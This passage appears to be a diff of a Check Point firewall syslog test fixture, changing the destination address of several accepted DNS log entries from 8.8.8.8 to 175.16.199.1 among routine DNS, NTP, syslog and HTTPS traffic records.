__policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50186"; service:"80"; src:"192.168.1.100"; tcp_flags:"FIN-ACK"; tcp_packet_out_of_state:"First packet isn't SYN"] -<134>1 2020-03-29T21:14:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810f9d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48492"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T21:14:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810f9d,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585516445"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41912"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T21:14:15Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; 
flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810fa7,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585516455"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59451"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T21:14:15Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810fa7,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585516455"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55735"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T21:14:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810f9d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; 
layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48492"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T21:14:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810f9d,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585516445"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41912"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T21:14:15Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810fa7,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585516455"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59451"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T21:14:15Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; 
ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810fa7,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585516455"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55735"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T21:14:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810fa9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-29T21:14:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810fad,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"129.250.35.250"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; 
match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38990"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T21:14:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810fb1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585516465"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37843"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T21:14:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810fb1,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585516465"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45614"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T21:14:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; 
loguid:"{0x5e810fbb,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585516475"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33106"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T21:14:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810fbb,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585516475"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43085"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T21:14:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810fb1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585516465"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; 
match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37843"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T21:14:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810fb1,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585516465"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45614"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T21:14:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e810fbb,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585516475"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33106"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T21:14:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; 
loguid:"{0x5e810fbb,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585516475"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43085"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T21:14:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810fbd,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-29T21:14:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810fcd,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; 
rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51736"; service:"443"; service_id:"https"; src:"192.168.1.117"] <134>1 2020-03-29T21:14:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810fcd,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51737"; service:"443"; service_id:"https"; src:"192.168.1.117"] 
@@ -5559,23 +5559,23 @@ <134>1 2020-03-29T21:23:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8111d6,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37790"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10525"; xlatesrc:"0.0.0.0"] <134>1 2020-03-29T21:23:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8111d6,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59065"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T21:23:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8111d6,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; 
__policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"57874"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10526"; xlatesrc:"0.0.0.0"] -<134>1 2020-03-29T21:23:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8111e0,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57972"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T21:23:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8111e0,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585517024"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; 
rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47803"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T21:23:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8111ea,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585517034"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52617"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T21:23:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8111e0,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57972"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T21:23:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8111e0,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585517024"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47803"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T21:23:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8111ea,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585517034"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 